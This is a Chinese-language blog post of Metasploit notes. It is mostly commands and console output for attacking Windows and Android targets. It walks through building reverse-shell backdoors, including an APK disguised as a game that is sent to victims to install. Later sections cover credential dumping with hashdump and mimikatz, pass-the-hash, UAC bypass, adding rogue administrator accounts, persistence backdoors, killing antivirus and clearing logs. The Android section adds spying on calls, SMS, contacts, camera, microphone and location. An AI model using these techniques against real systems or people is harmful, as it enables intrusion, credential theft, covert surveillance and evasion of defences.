Metasploit笔记整理


0x1 反弹脚本的使用

0x1.1 使用msfvenom生成反弹文件

用msfvenom生成一个反弹木马文件,发给目标,等待点击触发反弹

生成Windows后门

msf> msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=6666 -f exe -o /root/桌面/tcp.exe

生成PHP后门

msf> msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=6666 -f raw > php.php

生成ASPX后门

msf> msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=6666 R | msfencode -e x86/shikata_ga_nai -a x86 -t aspx -o door.aspx

生成APK后门

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=6666 -f apk -o /root/Desktop/TempleRun2.apk

0x1.2 msf监听

利用msf的handler模块进行监听,获得反弹shell

1
2
3
4
5
6
7
8
9
msf> use exploit/multi/handler

msf exploit(handler)> info # 可以查看该模块的信息
msf exploit(handler)> show options # 可以看到没有任何选项,因此还需要设置一个攻击的载荷payload

msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf exploit(handler)> set lhost 192.168.85.156
msf exploit(handler)> set lport 6666 # Kali监听本机的6666端口
msf exploit(handler)> exploit

0x1.3 获得反弹会话

查看所有会话

meterpreter> sessions -i

与会话1进行交互(interrection)

meterpreter> sessions -i 1

0x2 基本命令

meterpreter 下,如果不特殊说明(比如添加 l 字母:lcdgetlwd),使用的命令默认是用来操作被控肉鸡的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
meterpreter> getlwd                                 #获取自己当前系统的目录,等同于lpwd命令,Print local working directory
meterpreter> getwd #获取被控肉鸡的工作目录,等同于pwd命令,Print working directory
meterpreter> pwd #肉鸡上的当前工作目录
meterpreter> search #搜索文件,使用 search -h 查看帮助
meterpreter> ls #输入肉鸡上的当前目录列表,等同于dir
meterpreter> lls #显示自己当前系统的所有文件和文件夹
meterpreter> dir
meterpreter> rm c:\\111.txt #删除肉鸡上的111.txt文件
meterpreter> download c:\\1111.txt /root #下载肉鸡上的1111.txt文件到当前kali机器
meterpreter> upload /root/desktop/test.txt c:/ #将kali上的test.txt文件上传到目标肉鸡的c盘
meterpreter> edit c:\\xxx.txt #用vim编辑肉鸡上的xxx.txt文件
meterpreter> cat c:\\111.txt #显示肉鸡上的111.txt文件
meterpreter> cd #切换路径
meterpreter> lcd #切换自己当前系统的目录。
meterpreter> getuid #查看被控肉鸡的权限,等同于whoami
meterpreter> mkdir #创建文件夹
meterpreter> rmdir #删除文件夹
meterpreter > getpid #查看在被控肉鸡上的当前进程号,即:反弹脚本的进程pid
meterpreter > ps #查看运行的进程
meterpreter > kill 123 #杀死pid为123的进程,配合ps命令使用

0x3 端口转发连接3389

0x3.1 进行端口转发

1
2
3
4
5
6
7
8
9
10
11
12
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]


OPTIONS:

-L <opt> Forward: local host to listen on (optional). Reverse: local host to connect to.
-R Indicates a reverse port forward.
-h Help banner.
-i <opt> Index of the port forward entry to interact with (see the "list" command).
-l <opt> Forward: local port to listen on. Reverse: local port to connect to.
-p <opt> Forward: remote port to connect to. Reverse: remote port to listen on.
1
2
meterpreter > portfwd add -l 8888 -r 192.168.85.135 -p 3389 -u admin -p admin888        # 远程内网肉鸡的ip为192.168.85.135,并设置用户名以及密码直接登录
<li> Local TCP relay created: :8888 <-> 192.168.85.135:3389

0x3.2 连接内网3389

1
root@mykali:~/桌面# rdesktop -a 32 127.0.0.1:8888                # 在弹出的窗口中输入用户名密码进行连接,其中-f表示全屏,-a表示颜色深度

0x3.3 删除端口转发

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]


OPTIONS:

-L <opt> Forward: local host to listen on (optional). Reverse: local host to connect to.
-R Indicates a reverse port forward.
-h Help banner.
-i <opt> Index of the port forward entry to interact with (see the "list" command).
-l <opt> Forward: local port to listen on. Reverse: local port to connect to.
-p <opt> Forward: remote port to connect to. Reverse: remote port to listen on.
-r <opt> Forward: remote host to connect to.


meterpreter > portfwd list

Active Port Forwards
====================

Index Local Remote Direction
----- ----- ------ ---------
1 0.0.0.0:8888 192.168.85.135:3389 Forward

1 total active port forwards.

meterpreter > portfwd delete -l 8888
<li> Successfully stopped TCP relay on 0.0.0.0:8888

meterpreter > portfwd list

No port forwards are currently active.

如果连接远程桌面时提示:要登录到这台远程计算机,你必须授予允许通过终端服务登录的权限,默认地,“远程桌面用户组的成员拥有该权限,如果你不是远程桌面用户组或其他拥有该权限的成员,或者如果”远程桌面用户”组没有该权限,你必须被手动授予该权限。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
C:\Users\test>net localgroup

\\ADMIN-PC 的别名

--------------------------------------------------
*Administrators
*Backup Operators
*Cryptographic Operators
*Distributed COM Users
*Event Log Readers
*Guests
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Remote Desktop Users
*Replicator
*Users
命令成功完成。

使用cmd命令将目标肉鸡远程登录的用户添加到“Remote Desktop Users”组,这样就可以通过终端进行远程桌面连接admin用户了。

1
C:\Users\test>net localgroup "Remote Desktop Users" admin /add        # 将用户admin添加到远程桌面用户组

类似地,如果要将用户admin提升为超管用户权限,则:

1
C:\Users\test>net localgroup Administrators admin /add        # 将用户admin添加到Administrators组

0x4 抓取密码

0x4.1 抓取hash

在meterpreter会话中,直接使用hashdump命令导出来
[x] 如果权限不够,hashdump无法导出密文,则需要先将用户权限提升为system权限

1
2
3
meterpreter > hashdump 
admin:1003:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

0x4.2 抓取明文

首先需要获得一个meterpreter会话,然后加载mimikatz插件,查看明文

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
// 查看明文

meterpreter > load mimikatz
Loading extension mimikatz...Success.

meterpreter > help # 显示帮助信息,包括插件的
...
Mimikatz Commands # mimikatz命令
=================

Command Description
------- -----------
kerberos Attempt to retrieve kerberos creds # 将hash值变成明文:先执行msv命令,然后再执行kerberos命令
livessp Attempt to retrieve livessp creds
mimikatz_command Run a custom command # 执行自定义命令:比如mimikatz_command -f sekurlsa::searchPasswords可导出系统用户的明文密码
msv Attempt to retrieve msv creds (hashes) # 获取hash值(密文)
ssp Attempt to retrieve ssp creds
tspkg Attempt to retrieve tspkg creds
wdigest Attempt to retrieve wdigest creds


meterpreter > mimikatz_command -h
Usage: mimikatz_command -f func -a args

Executes a mimikatz command on the remote machine.
e.g. mimikatz_command -f sekurlsa::wdigest -a "full"

OPTIONS:

-a <opt> The arguments to pass to the command.
-f <opt> The function to pass to the command.
-h Help menu.

meterpreter > mimikatz_command -f sekurlsa::wdigest -a "full"

0x4.3 直接使用hash登录远程系统

如果通过手段获得了hash,但又得不到明文密码,我们依然可以直接使用hash值直接登录系统

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
msf > use exploit/windows/smb/psexec

msf exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as


Exploit target:

Id Name
-- ----
0 Automatic

msf exploit(windows/smb/psexec) > set rhost 192.168.85.135
rhost => 192.168.85.135

msf exploit(windows/smb/psexec) > set smbuser admin
smbuser => admin

msf exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634
smbpass => aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634

msf exploit(windows/smb/psexec) > exploit

<li> Started reverse TCP handler on 192.168.85.159:4444
<li> 192.168.85.135:445 - Connecting to the server...
<li> 192.168.85.135:445 - Authenticating to 192.168.85.135:445 as user 'admin'...
...
meterpreter >

获取System权限失败解决办法

提权不成功是因为有本地安全策略(UAC:user account control,用户账户控制),我们需要绕过这个安全策略就可以提权了。

常用的模块:

绕过:
bypassuac提权
exploit/windows/local/bypassuac_comhijack
windows/local/bypassuac_injection

备注:

除了使用UAC绕过,也可以尝试使用meterpreter命令中的migrate命令注入某个具有system权限的进程,从而获得system权限

0x5.1 getsystem提权失败案列

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
meterpreter > getuid                                                            # 查看权限(whoami),发现是普通用户权限
Server username: ADMIN-PC\zhangsan

meterpreter > getsystem -h # 查看提权命令getsystem的帮助信息
Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

-h Help Banner.
-t <opt> The technique to use. (Default to '0').
0 : All techniques available
1 : Named Pipe Impersonation (In Memory/Admin)
2 : Named Pipe Impersonation (Dropper/Admin)
3 : Token Duplication (In Memory/Admin)

meterpreter > getsystem # 提权:失败
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

meterpreter > getsystem -t 1 # 提权:失败
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)

meterpreter > getsystem -t 2 # 提权:失败
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (Dropper/Admin)

meterpreter > getsystem -t 3 # 提权:失败
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Token Duplication (In Memory/Admin)

0x5.2 通过bypassuac绕过提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
meterpreter > getsystem -t 3                                                    # 提权:失败
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Token Duplication (In Memory/Admin)

meterpreter > background # 将meterpreter转入后台
<li> Backgrounding session 2...



msf exploit(multi/handler) > search bypassuac # 搜索bypassuac相关的模块

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/local/bypassuac 2010-12-31 excellent Windows Escalate UAC Protection Bypass
exploit/windows/local/bypassuac_comhijack 1900-01-01 excellent Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
exploit/windows/local/bypassuac_eventvwr 2016-08-15 excellent Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
exploit/windows/local/bypassuac_fodhelper 2017-05-12 excellent Windows UAC Protection Bypass (Via FodHelper Registry Key)
exploit/windows/local/bypassuac_injection 2010-12-31 excellent Windows Escalate UAC Protection Bypass (In Memory Injection)
exploit/windows/local/bypassuac_injection_winsxs 2017-04-06 excellent Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
exploit/windows/local/bypassuac_vbs 2015-08-22 excellent Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)

msf exploit(multi/handler) > use exploit/windows/local/bypassuac_comhijack # 使用模块

msf exploit(windows/local/bypassuac_comhijack) > show options # 查看模块选项,发现需要设置一个session的id,操作系统target会自动选择(可以通过show targets查看)

Module options (exploit/windows/local/bypassuac_comhijack):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.


Exploit target:

Id Name
-- ----
0 Automatic

msf exploit(windows/local/bypassuac_comhijack) > sessions -l # 查看当前的sessions列表

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter x86/windows ADMIN-PC\zhangsan @ ADMIN-PC 192.168.85.158:6666 -> 192.168.85.135:49594 (192.168.85.135)

msf exploit(windows/local/bypassuac_comhijack) > set session 2 # 给bypassuac模块设置一个session
session => 2

msf exploit(windows/local/bypassuac_comhijack) > exploit

[-] Handler failed to bind to 192.168.85.158:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
<li> UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
<li> Targeting Computer Managment via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
<li> Uploading payload to C:\Users\zhangsan\AppData\Local\Temp\CMresjGh.dll ...
<li> Executing high integrity process ...
<li> Sending stage (179779 bytes) to 192.168.85.135
<li> Meterpreter session 3 opened (192.168.85.158:4444 -> 192.168.85.135:49608) at 2018-03-24 21:46:54 +0800 # 发现开启了一个session
<li> Cleaining up registry ...
<li> Exploit completed, but no session was created.

msf exploit(windows/local/bypassuac_comhijack) > sessions -l

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter x86/windows ADMIN-PC\zhangsan @ ADMIN-PC 192.168.85.158:6666 -> 192.168.85.135:49594 (192.168.85.135)
3 meterpreter x86/windows ADMIN-PC\zhangsan @ ADMIN-PC 192.168.85.158:4444 -> 192.168.85.135:49608 (192.168.85.135)

msf exploit(windows/local/bypassuac_comhijack) > sessions -i 3 # 与id为3的会话进行交互
<li> Starting interaction with 3...

meterpreter > getuid # 查看权限
Server username: ADMIN-PC\zhangsan

meterpreter > getsystem # 提权
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > getuid # 查看权限,发现成功提升为system权限了
Server username: NT AUTHORITY\SYSTEM

提升权限后,我们添加用户admin,然后添加到管理员组,开启远程桌面:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
meterpreter > shell                                                         # 进入目标的shell命令
Process 4880 created.
Channel 2 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>chcp 65001 # 修改终端的代码页为utf-8,即65001,避免乱码
chcp 65001
Active code page: 65001

C:\Windows\system32>net user # 查看当前存在的用户
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator Guest zhangsan
The command completed with one or more errors.


C:\Windows\system32>net user admin admin /add # 添加用户,用户名、密码均为admin
net user admin admin /add
The command completed successfully.

C:\Windows\system32>net localgroup administrators admin /add # 将用户admin添加到超管administrators组
net localgroup administrators admin /add
The command completed successfully.

C:\Windows\system32>net user admin # 查看用户admin的相关信息,发现属于administrators组
net user admin
User name admin
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 2018/3/24 22:29:56
Password expires 2018/5/5 22:29:56
Password changeable 2018/3/24 22:29:56
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon Never

Logon hours allowed All

Local Group Memberships *Administrators *Users # 属于administrators组
Global Group memberships *None
The command completed successfully.


C:\Windows\system32>exit # 退出shell,返回到meterpreter界面
exit

meterpreter > background # 将meterpreter放入后台,准备进入msf使用rdesktop远程桌面
<li> Backgrounding session 7...

msf exploit(windows/local/bypassuac_injection) > sessions -l # 查看当前会话列表

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
7 meterpreter x86/windows NT AUTHORITY\SYSTEM @ ADMIN-PC 192.168.85.158:4444 -> 192.168.85.135:49622 (192.168.85.135)

msf exploit(windows/local/bypassuac_injection) > sessions -i 7 # 与会话7进行交互
<li> Starting interaction with 7...

meterpreter > ifconfig # 查看IP


Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:50:56:24:01:f8
MTU : 1500
IPv4 Address : 192.168.85.135
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::75d8:f29b:5b86:a540
IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter > background # 将meterpreter放入后台,准备进入msf界面,使用linux命令rdesktop远程桌面
<li> Backgrounding session 7...

msf exploit(windows/local/bypassuac_injection) > rdesktop 192.168.85.135 -u admin -p admin #使用rdesktop远程桌面连接,用户名、密码都为admin

....

0x6 加载插件

输入load (空格),然后按两次Tab,可以查可以加载的插件列表

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
meterpreter > load                                                  # 按两次Tab查看所有列表
load espia load incognito load lanattacks load powershell load sniffer
load extapi load kiwi load mimikatz load python load winpmem

meterpreter > load mimikatz
Loading extension mimikatz...Success.

meterpreter > help
...
Mimikatz Commands
=================

Command Description
------- -----------
kerberos Attempt to retrieve kerberos creds # 将hash值变成明文:先执行msv命令,然后再执行kerberos命令
livessp Attempt to retrieve livessp creds
mimikatz_command Run a custom command # 执行自定义命令:比如mimikatz_command -f sekurlsa::searchPasswords可导出系统用户的明文密码
msv Attempt to retrieve msv creds (hashes) # 获取hash值(密文)
ssp Attempt to retrieve ssp creds
tspkg Attempt to retrieve tspkg creds
wdigest Attempt to retrieve wdigest creds

meterpreter > mimikatz_command -h # 输入mimi然后按Tab补全得到mimikatz_command
Usage: mimikatz_command -f func -a args

Executes a mimikatz command on the remote machine.
e.g. mimikatz_command -f sekurlsa::wdigest -a "full"

OPTIONS:

-a <opt> The arguments to pass to the command.
-f <opt> The function to pass to the command.
-h Help menu.

meterpreter > mimikatz_command -f sekurlsa::wdigest -a "full"
"0;315414","NTLM","zhangsan","ADMIN-PC","
zhangsan,ADMIN-PC,zhangsan888"
"0;315363","NTLM","zhangsan","ADMIN-PC","
zhangsan,ADMIN-PC,zhangsan888"
"0;997","Negotiate","LOCAL SERVICE","NT AUTHORITY","
,,"
"0;996","Negotiate","ADMIN-PC$","WORKGROUP","
ADMIN-PC$,WORKGROUP,"
"0;45513","NTLM","","",""
"0;999","NTLM","ADMIN-PC$","WORKGROUP","
ADMIN-PC$,WORKGROUP,"

0x7 控制安卓端手机

0x7.1 生成反弹后门

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444 -f apk -o /root/Desktop/TempleRun2.apk

生成apk文件后,将生成的APK文件发送给目标手机,诱发受害者安装、点击。

0x7.2 监听和处理反弹

1
2
3
4
5
msf > use exploit/multi/handler
msf > set payload android/meterpreter/reverse_tcp
msf > set lhost 192.168.1.10
msf > set lport 6666
msf > exploit

当目标点击apk文件后,会得到反弹meterpreter

0x7.3 后渗透之安卓

可以通过help命令查看相关的命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
meterpreter > sysinfo

Computer : localhost
OS : Android 4.4.4 - Linux 3.4.0-g26e4aff-00680-gaa7791b (armv7l)
Meterpreter : java/android

meterpreter > check_root # 查看手机是否已经取得root权限
<li> Device is not rooted

meterpreter > dump_calllog # 下载目标手机上的通话记录
...
meterpreter > webcam_stream # 打开摄像头实时画面,会生成一个html文件,在浏览器打开资源管理器的路径可查看到,如:file:///root/xxx.html
...
meterpreter > wlan_geolocate # 查看手机目前所处的大概位置(将生成的URL复制到浏览器打开可看到定位)
...
meterpreter > send_sms -d 13698567890 -t 你好 # 发送短信
...
meterpreter > dump_sms # 导出短信列表
...
meterpreter > dump_contacts # 导出联系人列表
...

修改手机壁纸

1
2
3
4
5
6
7
8
9
meterpreter > background

msf > use post/multi/manage/set_wallpaper

msf post (set_wallpaper)>set WALLPAPER_FILE /root/Desktop/hack.jpg

msf post (set_wallpaper)>set session 1

msf post (set_wallpaper)>exploit

0x8 权限维持(俗称维权)

Meterpreter的shell运行在内存中,目标重启就会失效,如果管理员给系统打上补丁,那么就没办法再次使用exploit获取权限,所以需要持久的后门对目标进行控制。

Msf提供了两种后门,一种是metsvc(通过服务启动),一种是persistence(支持多种方式启动)。

0x8.1 metsvc

使用run metsvc -h查看帮助,一共有三个参数。
-A:安装后门后,自动启动exploit/multi/handler模块连接后门
-h:查看帮助
-r:删除后门

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
meterpreter > run metsvc -A

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
<li> Creating a meterpreter service on port 31337
<li> Creating a temporary installation directory C:\Users\zhangsan\AppData\Local\Temp\CgfTLDlgpSXpA...
<li> >> Uploading metsrv.x86.dll...
<li> >> Uploading metsvc-server.exe...
<li> >> Uploading metsvc.exe...
<li> Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.

<li> Trying to connect to the Meterpreter service at 192.168.85.135:31337...
meterpreter > <li> Meterpreter session 6 opened (192.168.85.159:44823 -> 192.168.85.135:31337) at 2018-03-27 21:37:58 +0800

meterpreter >

当我们想要再次连接对方时,只需要设置对方的监听对口和对方的ip即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
msf > use exploit/multi/handler 

msf exploit(multi/handler) > set payload windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp

msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (windows/metsvc_bind_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 6666 yes The listen port
RHOST 192.168.85.135 no The target address


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf exploit(multi/handler) > set lport 31337 #默认绑定31337端口
lport => 31337
msf exploit(multi/handler) > set rhost 192.168.85.135
rhost => 192.168.85.135
msf exploit(multi/handler) > exploit
。。。

meterpreter >

0x8.2 Persistence

使用run persistence -h查看参数
-L:自启动脚本的路径,默认为%TEMP%
-P:需要使用的payload,默认为windows/meterpreter/reverse_tcp
-S:作为一个服务在系统启动时运行(需要SYSTEM权限)
-T:要使用的备用可执行模板
-U:用户登陆时运行
-X:系统启动时运行
-i:后门每隔多少秒尝试连接服务端
-p:服务端监听的端口
-r:服务端ip

生成后门

run persistence -U -i 10 -p 6666 -r 192.168.1.10

连接后门

1
2
3
4
5
msf> use exploit/multi/handler
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf exploit(handler)> set lhost 192.168.85.156
msf exploit(handler)> set lport 6666
msf exploit(handler)> exploit

0x9 内网渗透

获得内网的 meterpreter 之后:

可以通过 post/multi/manage/autoroute 模块查看子网、路由等信息

内网可能存在域管理,可以使用 use incognite 加载扩展,并使用相关命令来劫持域管理

内网渗透测试之域渗透详解

内网渗透信息收集综合实操报告

1x0 信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
meterperter> run post/windows/gather/checkvm            # 检测目标机是否为虚拟机(判断并不准确,模块代码仍需完善)
meterperter> run killav # 杀死目标主机运行的杀毒软件,可能会误杀,比如会杀死cmd.
meterperter> run post/windows/gather/enum_applications # 获取安装软件信
meterperter> run post/windows/gather/dumplinks # 获取目标机器最近的文件操作
meterperter> run post/windows/gather/smart_hashdump # 获取目标机系统用户Hash,当然也可以直接使用hashdump命令,但使用脚本更加隐蔽
meterperter> load mimikatz # 通过mimikatz获取明文密码
meterperter> help # 查看帮助信息,包括mimikatz的命令
meterperter> msv # 通过mimikatz的msv命令导出msv凭证(hash密码),前提是当前进程为当前进程为system权限
meterperter> kerberos # 通过mimikatz的kerberos命令导出明文密码

# mimikatz导出明文密码的其他方式

meterperter> meterpreter > mimikatz_command -f samdump::hashes # 导出系统用户hash
meterperter> mimikatz_command -f sekurlsa::searchPasswords # 导出系统用户的明文密码

1x1 开启远程桌面服务(3389)

1
2
3
4
meterpreter> shell
C:\Users\test>

C:\Users\test> wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

1x2 路由信息

1
2
3
4
5
meterpreter > run get_local_subnets                     # 获取目标主机的当前路由

meterpreter > run autoroute -s 192.168.3.0/24 # 添加路由

meterpreter > run autoroute -p

1x3 常用命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
meterpreter > background                                # 退出到msf命令提示符下

meterpreter > sessions # 查看会话信息

meterpreter > lpwd # 等价于在kali上输入pwd

meterpreter > lcd /etc # 等价于在kali上输入cd /etc

meterpreter > run post/windows/gather/smart_hashdump # 获取目标主机上用户的hash值

meterpreter > run post/windows/capture/keylog_recorder # 键盘记录

meterpreter > run killav # 结束目标主机上的杀毒软件相关进程

meterpreter > clearev # 清除系统日志

meterpreter > getuid # 查看当前用户

meterpreter > getsystem # 提权到system用户

meterpreter > getprivs # 查看当前用户具有的权限

meterpreter > getpid # 查看meterpreter注入到了什么进程中

meterpreter > migrate 1436 # 更改到pid1436进程中

meterpreter > getpid # 重新使用getpid命令查看

meterpreter > hashdump # 获取目标主机上用户的hash值

meterpreter > sysinfo # 查看目标系统的信息

meterpreter > kill 188 # 结束188进程

meterpreter > shell # 获取目标操作系统的shell

meterpreter > idletime # 查看目标主机已经空闲了多长时间

meterpreter > edit C:\\Windows\\System32\\drivers\\etc\\hosts # 编辑hosts文件

meterpreter > record_mic -d 10 -f /root/桌面/1.mp4 # 监听麦克风

meterpreter > load python # 加载python插件

1x4 文件执行

1
2
3
4
5
6
7
8
meterpreter > dir windows\\system32\\nc.exe

meterpreter > execute -f nc -nvlp 3333 # 执行nc.exe
meterpreter > execute -f cmd.exe -i -H # 获得目标主机的shell,-i交互模式,-H隐藏

meterpreter > execute -H -m -d calc.exe -f wce32.exe -a "-o foo.txt" # 选项-m 直接从内存中执行攻击端的可执行文件,不在硬盘存储,所以不会留下痕迹,且能避开杀毒软件的查杀;-d 设置需要显示的进程名,可以避开敏感人士的检查。

meterpreter > cat foo.txt

参考资料

Windows内核漏洞利用提权教程
小白入坑MSF

待补充…

本文收集于网络,如有侵犯请发邮件or评论联系我,我会在第一时间修改,删除。
------ 本文结束 ------

本文标题:Metasploit笔记整理

文章作者:ApiCoder

发布时间:2019年08月09日 - 16:08

最后更新:2019年08月09日 - 17:08

原始链接:http://www.safeinfo.me/2019/08/09/metasploit超详细笔记.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

ApiCoder wechat
扫一扫,加入信安圈。
0%